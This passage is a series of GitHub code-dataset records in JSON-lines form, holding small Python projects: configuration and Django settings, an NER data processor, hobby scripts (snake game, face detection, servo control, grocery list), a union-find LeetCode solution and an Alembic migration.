deployment\n\nDEBUG = True\n\"\"\"is the web server in debug mode\"\"\"\n\nPORT = 5027\n\"\"\"port to start the webserver on\"\"\"\n\nSSL = False\n\"\"\"support SSL requests\"\"\"\n\nTHREADED = True\n\"\"\"is the web server in threaded mode\"\"\"\n\n############################################\n# important overrides for the ES module\n\n# elasticsearch back-end connection settings\nELASTIC_SEARCH_HOST = \"http://gateway:9200\"\n\"\"\"base url to access elasticsearch\"\"\"\n\nELASTIC_SEARCH_INDEX = \"jper\"\n\"\"\"index name in elasticsearch where our types are stored\"\"\"\n\nELASTIC_SEARCH_VERSION = \"1.5.2\"\n\"\"\"version of elasticsearch which we're using - matters for certain semantics of requests\"\"\"\n\n# Classes from which to retrieve ES mappings to be used in this application\n# (note that if ELASTIC_SEARCH_DEFAULT_MAPPINGS is sufficient, you don't need to\n# add anything here\nELASTIC_SEARCH_MAPPINGS = [\n # 
\"service.dao.MyDAO\"\n]\n\"\"\"type-specific mappings to be used when initialising - currently there are none\"\"\"\n\n# initialise the index with example documents from each of the types\n# this will initialise each type and auto-create the relevant mappings where\n# example data is provided\nELASTIC_SEARCH_EXAMPLE_DOCS = [\n # \"service.dao.MyDAO\"\n]\n\"\"\"types which have their mappings initialised by example when initialising - currently there are none\"\"\"\n\n############################################\n# important overrides for account module\n\nACCOUNT_ENABLE = False\n\"\"\"Disable user accounts\"\"\"\n\nSECRET_KEY = \"super-secret-key\"\n\"\"\"secret key for session management - only used when accounts are enabled\"\"\"\n\n#############################################\n# important overrides for storage module\n\nSTORE_IMPL = \"octopus.modules.store.store.StoreLocal\"\n\"\"\"implementation class of the main filestore\"\"\"\n\nSTORE_TMP_IMPL = \"octopus.modules.store.store.TempStore\"\n\"\"\"implementation class of the temporary local filestore\"\"\"\n\nfrom octopus.lib import paths\nSTORE_LOCAL_DIR = paths.rel2abs(__file__, \"..\", \"service\", \"tests\", \"local_store\", \"live\")\n\"\"\"path to local directory for local file store - specified relative to this file\"\"\"\n\nSTORE_TMP_DIR = paths.rel2abs(__file__, \"..\", \"service\", \"tests\", \"local_store\", \"tmp\")\n\"\"\"path to local directory for temp file store - specified relative to this file\"\"\"\n\n\n#############################################\n# Re-try/back-off settings\n\n# from the http layer\n\n# specific to this app\n\n# Minimum amount to leave between attempts to deposit, in the event that there was a semi-permanent error\n# default to 1 hour\nLONG_CYCLE_RETRY_DELAY = 3600\n\"\"\"Delay in between attempts to communicate with a repository that is failing, in seconds\"\"\"\n\n# Maximum number of times to try and deposit before giving up and turning off repository sword submission\n# for a given account\nLONG_CYCLE_RETRY_LIMIT = 24\n\"\"\"Number of re-try attempts against a failing repository before we give up\"\"\"\n\n###############################################\n## Other app-specific settings\n\nDEFAULT_SINCE_DATE = \"1970-01-01T00:00:00Z\"\n\"\"\"The date from which the first request against the JPER API will be made when listing a repository's notifications\"\"\"\n\n# how many seconds in between each run of the script\nRUN_THROTTLE = 2\n\"\"\"delay between executions of the deposit script, in seconds\"\"\"\n\n# whether to store sword response data (receipt, etc). 
Recommend only to store during testing operation\nSTORE_RESPONSE_DATA = False\n\"\"\"Whether to store response data or not - set to True if testing\"\"\"","repo_name":"JiscPER/jper-sword-out","sub_path":"config/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1417634596","text":"from enums.run_type import RunType\nfrom entities.ner.ne_line import NELine\nfrom enums.language import Language\nfrom entities.ner.ne_collection import NECollection\nimport os\nimport csv\nfrom services.data_service import DataService\nfrom services.file_service import FileService\nfrom services.arguments.ner_arguments_service import NERArgumentsService\nfrom enums.entity_tag_type import EntityTagType\nfrom entities.cache.cache_options import CacheOptions\nfrom typing import Dict, List, Tuple\nimport random\n\nfrom enums.ocr_output_type import OCROutputType\n\nfrom entities.transformers.transformer_entry import TransformerEntry\n\nfrom services.process.process_service_base import ProcessServiceBase\nfrom services.tokenize.base_tokenize_service import BaseTokenizeService\n\nfrom services.vocabulary_service import VocabularyService\nfrom services.cache_service import CacheService\nfrom services.log_service import LogService\nfrom services.string_process_service import StringProcessService\n\n\nclass NERProcessService(ProcessServiceBase):\n def __init__(\n self,\n arguments_service: NERArgumentsService,\n vocabulary_service: VocabularyService,\n file_service: FileService,\n tokenize_service: BaseTokenizeService,\n data_service: DataService,\n cache_service: CacheService,\n string_process_service: StringProcessService):\n self._arguments_service = arguments_service\n self._tokenize_service = tokenize_service\n self._file_service = file_service\n self._data_service = data_service\n self._string_process_service = string_process_service\n\n self._entity_tag_types = arguments_service.entity_tag_types\n\n self.PAD_TOKEN = '[PAD]'\n self.START_TOKEN = '[CLS]'\n self.STOP_TOKEN = '[SEP]'\n\n self.pad_idx = 0\n self.start_idx = 1\n self.stop_idx = 2\n\n challenge_path = file_service.get_challenge_path()\n language_suffix = self._get_language_suffix(arguments_service.language)\n\n train_cache_key = f'train-data-limit-{arguments_service.train_dataset_limit_size}-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n validation_cache_key = f'validation-data-limit-{arguments_service.validation_dataset_limit_size}-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n test_cache_key = f'test-data-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n self._train_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n item_key=train_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-train-{language_suffix}.tsv'),\n limit=arguments_service.train_dataset_limit_size)))\n\n self._validation_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n item_key=validation_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-dev-{language_suffix}.tsv'),\n limit=arguments_service.validation_dataset_limit_size)))\n\n self._test_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n 
item_key=test_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-test-{language_suffix}.tsv'))))\n\n self._entity_mappings = self._create_entity_mappings(\n self._train_ne_collection,\n self._validation_ne_collection)\n\n vocabulary_cache_key = f'char-vocabulary'\n vocabulary_data = cache_service.get_item_from_cache(\n CacheOptions(item_key=vocabulary_cache_key),\n callback_function=lambda: self._generate_vocabulary_data(language_suffix))\n\n vocabulary_service.initialize_vocabulary_data(vocabulary_data)\n\n def preprocess_data(\n self,\n file_path: str,\n limit: int = None) -> NECollection:\n if not os.path.exists(file_path):\n raise Exception(f'NER File not found at \"{file_path}\"')\n\n collection = NECollection()\n\n with open(file_path, 'r', encoding='utf-8') as tsv_file:\n reader = csv.DictReader(\n tsv_file, dialect=csv.excel_tab, quoting=csv.QUOTE_NONE)\n current_sentence = NELine()\n\n for row in reader:\n if row['TOKEN'] == '':\n continue\n\n is_new_document = row['TOKEN'].startswith('# document')\n is_comment = row['TOKEN'].startswith('#')\n\n document_id = None\n if is_new_document:\n document_id = row['TOKEN'].split('=')[-1].strip()\n\n if len(current_sentence.tokens) == 0:\n current_sentence.document_id = document_id\n\n if is_new_document:\n if len(current_sentence.tokens) > 0:\n current_sentence.tokenize_text(\n self._tokenize_service,\n self._string_process_service,\n replace_all_numbers=self._arguments_service.replace_all_numbers,\n expand_targets=not self._arguments_service.merge_subwords)\n\n collection.add_line(current_sentence)\n\n current_sentence = NELine()\n if document_id is not None:\n current_sentence.document_id = document_id\n\n if limit and len(collection) >= limit:\n break\n elif is_comment:\n continue\n else:\n current_sentence.add_data(self._string_process_service, row, self._entity_tag_types)\n\n # add last document\n if len(current_sentence.tokens) > 0:\n current_sentence.tokenize_text(\n self._tokenize_service,\n self._string_process_service,\n replace_all_numbers=self._arguments_service.replace_all_numbers,\n expand_targets=not self._arguments_service.merge_subwords)\n\n collection.add_line(current_sentence)\n\n return collection\n\n def get_processed_data(self, run_type: RunType):\n if run_type == RunType.Train:\n return self._train_ne_collection\n elif run_type == RunType.Validation:\n return self._validation_ne_collection\n elif run_type == RunType.Test:\n if not self._arguments_service.evaluate:\n raise Exception(\n 'You must have an evaluation run to use test collection')\n return self._test_ne_collection\n\n raise Exception('Unsupported run type')\n\n def get_main_entities(self, entity_tag_type: EntityTagType) -> set:\n entity_mapping_keys = [\n key for key, value in self._entity_mappings[entity_tag_type].items() if value >= 4]\n entities = set([x[2:] for x in entity_mapping_keys if x[2:] != ''])\n return entities\n\n def get_labels_amount(self) -> Dict[EntityTagType, int]:\n result = {\n entity_tag_type: len(entity_mapping) for entity_tag_type, entity_mapping in self._entity_mappings.items()\n }\n\n return result\n\n def get_entity_labels(self, ne_line: NELine, ignore_unknown: bool = False) -> List[int]:\n labels = {\n entity_tag_type: None for entity_tag_type in self._entity_tag_types\n }\n\n for entity_tag_type in self._entity_tag_types:\n current_entity_tags = ne_line.get_entity_tags(entity_tag_type)\n labels[entity_tag_type] = [\n 
self.get_entity_label(entity, entity_tag_type, ignore_unknown=ignore_unknown) for entity in current_entity_tags\n ]\n\n return labels\n\n def get_entity_label(self, entity_tag: str, entity_tag_type: EntityTagType, ignore_unknown: bool = False) -> int:\n if entity_tag_type not in self._entity_mappings.keys():\n raise Exception(f'Invalid entity tag type - \"{entity_tag_type}\"')\n\n if entity_tag not in self._entity_mappings[entity_tag_type].keys():\n if ignore_unknown:\n return self._entity_mappings[entity_tag_type]['O']\n\n raise Exception(f'Invalid entity tag - \"{entity_tag}\"')\n\n return self._entity_mappings[entity_tag_type][entity_tag]\n\n def get_entity_by_label(self, label: int, entity_tag_type: EntityTagType, ignore_unknown: bool = False) -> str:\n if entity_tag_type not in self._entity_mappings.keys():\n raise Exception('Invalid entity tag type')\n\n for entity, entity_label in self._entity_mappings[entity_tag_type].items():\n if label == entity_label:\n return entity\n\n if ignore_unknown:\n return 'O'\n\n raise Exception('Entity not found for this label')\n\n def _create_entity_mappings(\n self,\n train_ne_collection: NECollection,\n validation_ne_collection: NECollection) -> Dict[EntityTagType, Dict[str, int]]:\n\n entity_mappings = {\n entity_tag_type: None for entity_tag_type in self._entity_tag_types\n }\n\n for entity_tag_type in self._entity_tag_types:\n entities = train_ne_collection.get_unique_entity_tags(\n entity_tag_type)\n entities.extend(\n validation_ne_collection.get_unique_entity_tags(entity_tag_type))\n entities = list(set(entities))\n entities.sort(key=lambda x: '' if x is None else x)\n entity_mapping = {x: i+3 for i, x in enumerate(entities)}\n entity_mapping[self.PAD_TOKEN] = self.pad_idx\n entity_mapping[self.START_TOKEN] = self.start_idx\n entity_mapping[self.STOP_TOKEN] = self.stop_idx\n\n entity_mappings[entity_tag_type] = entity_mapping\n\n return entity_mappings\n\n def _generate_vocabulary_data(self, language_suffix: str):\n unique_characters = set()\n\n for ne_line in self._train_ne_collection.lines:\n current_unique_characters = set(\n [char for token in ne_line.tokens for char in token])\n unique_characters = unique_characters.union(\n current_unique_characters)\n\n for ne_line in self._validation_ne_collection.lines:\n current_unique_characters = set(\n [char for token in ne_line.tokens for char in token])\n unique_characters = unique_characters.union(\n current_unique_characters)\n\n unique_characters = sorted(list(unique_characters))\n unique_characters.insert(0, '[PAD]')\n unique_characters.insert(1, '[UNK]')\n unique_characters.insert(2, '[CLS]')\n unique_characters.insert(3, '[EOS]')\n\n int2char = dict(enumerate(unique_characters))\n char2int = {char: index for index, char in int2char.items()}\n vocabulary_data = {\n 'characters-set': unique_characters,\n 'id2token': int2char,\n 'token2id': char2int\n }\n\n return vocabulary_data\n\n def _get_language_suffix(self, language: Language):\n if language == Language.Dutch:\n return 'nl'\n else:\n raise Exception('Unsupported language')\n","repo_name":"budh333/UnSilence_VOC","sub_path":"src/services/process/ner_process_service.py","file_name":"ner_process_service.py","file_ext":"py","file_size_in_byte":11770,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"21012358650","text":"from .base import *\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 
\"django-insecure-bj+(xr*n5rk@(0))ntjfe*y63*rpacb7@rw2x6li9f@ryhlzk6\"\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\"]\n\n\nINSTALLED_APPS += [\"livereload\"]\n\nMIDDLEWARE += [\n \"livereload.middleware.LiveReloadScript\",\n # 'debug_toolbar.middleware.DebugToolbarMiddleware',\n]\n\n\n# Database\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": BASE_DIR / \"db.sqlite3.debug\",\n }\n}\n","repo_name":"biplovsubedi/customfpl","sub_path":"customfpl/customfpl/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"437909787","text":"'''\nCreate a Python program that will capture and display a person's grocery shopping list.\nMake it so the program will continually prompt the user for another item until the point where they enter a blank item. After all the items\nhave been entered, try displaying the shopping list back to the user.\n'''\n\n\ngrocery_list = []\nfinished = False\n\nwhile not finished:\n\titem = input(\"Enter an item for your grocery list. Press Enter when done : \")\n\n\tif len(item) == 0:\n\t\tfinished = True\n\telse:\n\t\tgrocery_list.append(item)\n\t\tprint(\"Item has been added\")\n\nprint()\nprint(\"Your Grocery List\")\nprint(\"-\" * 18)\nfor item in grocery_list:\n\tprint(item)\n\n\n\n","repo_name":"F4Francisco/Python_Succinctly","sub_path":"Chapter5_List/Grocery_List.py","file_name":"Grocery_List.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74942111271","text":"import numpy as np\nfrom Overlap import dC_dAngle\nimport matplotlib.pyplot as plt\n\noverlap_start = 40 * 10 ** -6\noverlap_stop = 80 * 10 ** -6\nthickness = 25 * 10 ** -6\nnon_overlap_start = 5 * 10 ** -6\nnon_overlap_stop = 20 * 10 ** -6\noverlap_range = np.arange(overlap_start, overlap_stop, 5 * 10 ** -6)\nnon_overlap_range = np.arange(non_overlap_start, non_overlap_stop, 5 * 10 ** -6)\nvoltage = 80\nj = 68.75 * 10 ** -6 # final non-overlapping length\n\nfor i in overlap_range:\n T = abs(160*((voltage ** 2) * dC_dAngle(i + j, thickness, j, 0.75, 1000, 3.5 * 10 ** -6)))\n angles = np.linspace(0, 0.75, 999)\n # plt.axhline(y=4*10**-9, color='r', linestyle='-')\n plt.axvline(x=0.19, color='r', linestyle='-')\n #plt.axvline(x=-0.19, color='r', linestyle='-')\n plt.plot(angles, T, label=f'OL: {round(i*10**6,2)} \\u03BCm')\n plt.pause(0.1)\nplt.xlabel(\"angle (rad)\")\nplt.ylabel(\"Moment (Nm)\")\nplt.legend()\nplt.show()\n","repo_name":"jasperverduijn/MEMS-group10","sub_path":"Quick_and_dirty.py","file_name":"Quick_and_dirty.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"11223628881","text":"from turtle import Screen\r\nfrom Snake import Snake\r\nfrom food import Food\r\nimport time\r\nfrom scoreboard import Scoreboard\r\nscreen = Screen()\r\nscreen.setup(600, 600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Snake\")\r\nscreen.tracer(0)\r\n\r\nsnake = Snake()\r\nfood = Food()\r\nscore = Scoreboard()\r\nscreen.update()\r\n\r\nscreen.listen()\r\n\r\nscreen.onkey(snake.move_up, \"Up\")\r\nscreen.onkey(snake.move_left, \"Left\")\r\nscreen.onkey(snake.move_down, 
\"Down\")\r\nscreen.onkey(snake.move_right, \"Right\")\r\n\r\ngame_is_on = True\r\nwhile game_is_on:\r\n screen.update()\r\n time.sleep(.1)\r\n snake.move()\r\n if snake.head.distance(food) <= 15:\r\n food.regenerate()\r\n score.update_score()\r\n snake.increase_size()\r\n\r\n if snake.head.xcor() > 290 or snake.head.xcor() < -290 or snake.head.ycor() > 290 or snake.head.ycor() < -290:\r\n game_is_on = False\r\n score.game_over()\r\n if snake.collision():\r\n game_is_on = False\r\n score.game_over()\r\n\r\nscreen.exitonclick()\r\n","repo_name":"mjtamima/classic-snake-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22752775111","text":"# OpenCV-Python is a Python library designed to solve computer vision problems.\n# pip install opencv-python and import the library\nimport cv2\n\n\ndef identify_faces_in_img(imageName: str) -> None:\n \"\"\"Function that identifies faces in an image.\n @param imageName: a string representing the name of the image to process.\n Image with the same name must first be placed in the '/01-images/' directory.\n \"\"\"\n\n # Cascading classifiers are trained with several hundred \"positive\" sample views of a particular object and arbitrary \"negative\" images of the same size. After the classifier is trained it can be applied to an image and detect the object in question.\n # Haar Cascade is a machine learning object detection algorithm proposed by Paul Viola and Michael Jones\n # Create the haar cascade that detects frontal faces\n faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n # Read the image\n # imageName = \"img.jpg\" # Hardcoded\n # imageName = __import__(\"sys\").argv[1] # From SysArgs\n image = cv2.imread(f\"..\\\\01-images\\\\{imageName}\")\n\n # Show the original image\n print(\"Showing original image..\")\n cv2.imshow(\"Original Image\", image)\n cv2.waitKey()\n\n # Convert the image to Grayscale (8-bit, shades of gray image)\n # The reason for this is that gray channel is easy to process and is computationally less intensive as it contains only 1-channel of black-white.\n grayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Show the gray image\n print(\"Showing gray image..\")\n cv2.imshow(\"Gray Image\", grayImage)\n cv2.waitKey()\n\n # Detect faces in the gray image\n faces = faceCascade.detectMultiScale(grayImage)\n\n # Print the total number of detected faces and the coordinates of each\n print(f\"Number of detected faces: {len(faces)}\")\n print(\"Faces coordinates:\")\n index: int = 0\n for face in faces:\n index += 1\n print(f\"- Face {index}: {face}\")\n\n # Draw a rectangle around each face (on the original image, not the gray one)\n for (x, y, w, h) in faces:\n # Function accepts img, pt1, pt2, color (in BGR not RGB), thickness\n # pt1 and pt2 are the corners of the rectangle\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 0, 255), 2)\n # Red color is (255, 0, 0) in RGB\n\n if(len(faces)):\n print(\"Showing original image after drawing rectangles..\")\n # Save the image after drawing\n imgLoc: str = f\"..\\\\02-edited-images\\\\{imageName}\"\n print(f\"Image saved in {imgLoc}\")\n cv2.imwrite(imgLoc, image)\n else:\n print(\"No face is detected.\")\n\n # Show the original image after processing\n cv2.imshow(f\"Final Image (Number of detected faces: {len(faces)})\", image)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n imageName: str = 
__import__(\"sys\").argv[1] # From Args\n # try:\n identify_faces_in_img(imageName)\n # except:\n # print(\"Error occurred! Image is most likely unavailable.\")\n","repo_name":"THammami01/face-recognition-unified","sub_path":"operations/identify_faces_in_img.py","file_name":"identify_faces_in_img.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"39492359878","text":"import codecs\nimport os\n\nimport ru_core_news_md\n\nnlp = ru_core_news_md.load()\n\npages = os.listdir('pages')\nprint(pages)\n\nfor page in pages:\n text = codecs.open('pages/' + page, encoding='utf-8', mode='r').read()\n document = nlp(text)\n with open('lemm/' + page, 'w', encoding='utf8') as out:\n for token in document:\n # Get the lemma for each token\n out.write(token.lemma_.lower())\n # Insert white space between each token\n out.write(' ')\n","repo_name":"oas1s/poisk","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"37786313459","text":"import pigpio\nimport time\n\nPWM_CONTROL_PIN = 18\nPWM_FREQ = 50\nSTEP = 15\n\npi = pigpio.pi()\n\ndef angle_to_duty_cycle(angle=0):\n duty_cycle = int(500 * PWM_FREQ + (1900 * PWM_FREQ * angle / 180))\n return duty_cycle\n\ntry:\n print('Press Ctrl-C to stop the program')\n for angle in range(0, 181, STEP):\n dc = angle_to_duty_cycle(angle)\n print('angle={: >3}, duty cycle={: >6}'.format(angle, dc))\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, dc)\n time.sleep(2)\n for angle in range(180, -1, -STEP):\n dc = angle_to_duty_cycle(angle)\n print('angle={: >3}, duty cycle={: >6}'.format(angle, dc))\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, dc)\n time.sleep(2)\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, angle_to_duty_cycle(90))\n while True:\n pass # idle loop keeps the PWM output running until Ctrl-C\nexcept KeyboardInterrupt:\n print('Closing the program')\nfinally:\n pi.set_mode(PWM_CONTROL_PIN, pigpio.INPUT)","repo_name":"ss203242430/schoolProject","sub_path":"robotScript/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16176015624","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# My math functions\ndef linearfunc2(x, **kwargs):\n a= kwargs[\"a\"]\n b = kwargs[\"b\"]\n y = a * x + b\n return y\n\ndef parabole2(x, **kwargs):\n a= kwargs[\"a\"]\n y = x ** 2 + a\n return y\n\ndef sin(x, **kwargs):\n a = kwargs[\"a\"]\n b = kwargs[\"b\"]\n c = kwargs[\"c\"]\n y = a*np.sin(x*b)+c\n return y\n\n\n# Generalized math functions\ndef generalFunc(func, x, **kwargs):\n return func(x, **kwargs)\n\n\n# Tangent line calc and plot\ndef calc_plot_derv(p, x, derv_a, derv_b):\n\n z=2\n c = (z**2/(1+derv_a[p]**2))**0.5\n c = c/2\n print(c)\n\n\n arr = np.arange(x[p]-3, x[p]+3, 0.1)\n new_y = derv_a[p] * arr + derv_b[p]\n plt.plot(arr, new_y)\n\n\n# Tangent line calc and plot + func plot\ndef plotAll(p, x, derv_a, derv_b, func, **kwargs):\n plt.plot(x, generalFunc(func, x, **kwargs))\n calc_plot_derv(p, x, derv_a, derv_b)\n plt.show()\n\n# Main function\ndef myDerv(funcToUse, p, x ,dx=0.0001, **kwargs):\n\n\n y_x_dx = generalFunc(funcToUse, (x + dx), **kwargs) # f(x+dx)\n y_x = generalFunc(funcToUse, (x), **kwargs) # f(x)\n\n # Slope: a=(f(x+dx)-f(x))/dx Intercept: b= y- a*x\n derv_a = (y_x_dx - y_x) / dx # a of tangent at each point\n derv_b = y_x - derv_a * x # b of tangent at each point\n\n # Convert 
point to index and plot\n itemindex = np.where(np.round(x, 3) == p)\n plotAll(itemindex[0][0], x, derv_a, derv_b, funcToUse, **kwargs)\n\n\n\n\n\n# Code\n# Plot x data\nx = np.arange(-10, 10, 0.1)\n\n# params\na = 2 # if linear function\nb = 5 # if linear and parabolic\nc = 3\ndx = 0.000000000001 # dx\np = 7\n\nd={1:sin,\n 2:parabole2,\n 3:linearfunc2,\n 4:sin\n }\n\nfunc = d[2]\nsomeNewFunc = (lambda x, **a: x**3-5*x)\n\nmyDerv(someNewFunc, p, x, dx, a = a, b = b, c = c)\n\n\n","repo_name":"royassis/derivativePlotter","sub_path":"main_but_w_kwargs.py","file_name":"main_but_w_kwargs.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"41458120509","text":"#\n# @lc app=leetcode id=684 lang=python3\n#\n# [684] Redundant Connection\n#\n\n# @lc code=start\nfrom collections import defaultdict\n\n\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n\n roots = dict()\n rank = dict()\n\n for i, j in edges:\n roots[i] = i\n roots[j] = j\n rank[i] = 1\n rank[j] = 1\n\n def find(a):\n # step is 1, a = a's root, root[a] = root of root of a\n\n # while roots[a] !=a:\n # temp = roots[a]\n # roots[a] = roots[roots[a]]\n # a=temp\n # return a\n\n #####\n # 2023 revision\n if roots[a] != a:\n roots[a] = find(roots[a])\n\n return roots[a]\n #####\n \n\n\n\n while roots[a] != a:\n # step is 2, previous method has step = 1, a = root of a's root\n # regardless of what step is, the answer stays constant once\n # roots[a] == a, so this is correct and faster\n # root[a] != a\n # so a's root = root[ a's root -> root[a]] \n temp = roots[roots[a]]\n roots[a] = temp # step is 1\n a = temp # step is 2\n\n # short but it's the same\n\n # roots[a] = roots[roots[a]]\n # a = roots[a]\n return a\n\n for i, j in edges:\n\n pi, pj = find(i), find(j)\n\n if pi == pj:\n return [i, j]\n\n elif rank[pi] > rank[pj]:\n roots[pj] = pi\n elif rank[pi] < rank[pj]:\n roots[pi] = pj\n\n else:\n roots[pj] = roots[pi]\n rank[pi] += 1\n\n return []\n\n\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/684.redundant-connection.py","file_name":"684.redundant-connection.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"12860786996","text":"# boj 2164 Card 2, silver 4\n# noj.am/2164\nfrom collections import deque\n\nN = int(input())\ncard = deque(i for i in range(1, N+1)) # set up the cards as a deque\n\nwhile len(card) > 1: # until one card is left\n card.popleft() # discard the front card\n card.rotate(-1) # move the front card to the back\n\nprint(card[0]) # the first element of the deque\n","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/2164_카드2_s4/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74151413034","text":"\"\"\"adds alias table\n\nRevision ID: a016a16f2341\nRevises: d34ba7ae70bb\nCreate Date: 2021-12-27 06:02:27.971079\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"a016a16f2341\"\ndown_revision = \"d34ba7ae70bb\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table(\n \"alias\",\n sa.Column(\"id\", sa.BigInteger(), nullable=False),\n sa.Column(\n \"created_at\",\n sa.DateTime(),\n server_default=sa.text(\"(now() at time zone 'utc')\"),\n nullable=False,\n ),\n sa.Column(\n \"updated_at\",\n sa.DateTime(),\n server_default=sa.text(\"(now() at time zone 'utc')\"),\n nullable=True,\n ),\n sa.Column(\"distinct_person_id\", sa.Text(), nullable=False),\n sa.Column(\"visitor_uuid\", sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f('ix_alias_distinct_person_id'), 'alias', ['distinct_person_id'], unique=False)\n op.create_index(op.f('ix_alias_visitor_uuid'), 'alias', ['visitor_uuid'], unique=False)\n\n\ndef downgrade():\n op.drop_index(op.f('ix_alias_visitor_uuid'), table_name='alias')\n op.drop_index(op.f('ix_alias_distinct_person_id'), table_name='alias')\n op.drop_table(\"alias\")\n","repo_name":"bflannery/magic-pixel","sub_path":"event-tracker/migrations/versions/a016a16f2341_adds_alias_table.py","file_name":"a016a16f2341_adds_alias_table.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12494573180","text":"from django.db import models as _m\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Semester(_m.IntegerChoices):\n FIRST = 1, _(\"1-st\")\n SECOND = 2, _(\"2-nd\")\n THIRD = 3, _(\"3-rd\")\n FORTH = 4, _(\"4-th\")\n FIFTH = 5, _('5-th')\n SIXTH = 6, _('6-th')\n SEVENTH = 7, _('7-th')\n EIGHTH = 8, _('8-th')\n NINTH = 9, _('9-th')\n TENTH = 10, _(\"10-th\")\n\n\nclass Degree(_m.TextChoices):\n BACHELORS = \"BS\", _(\"Bachelor's Degree\")\n MASTERS = \"MS\", _(\"Master's Degree\")\n PHD = \"PHD\", _(\"PhD\")\n DIPLOMA = \"DPL\", _(\"Diploma\")\n","repo_name":"PritamChk/django-custom-user-model-example","sub_path":"testprofile/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24085608234","text":"# -----------------------------------------+\r\n# Andrew Lander |\r\n# CSCI 107, Assignment 3 |\r\n# Last Updated: September 21, 2022 | \r\n# -----------------------------------------|\r\n# This is a drawing of Aang when he's in |\r\n# the iceberg. It also has only an earth |\r\n# symbol - I was hoping to get all of them,|\r\n# but I ran out of time. Oh well! 
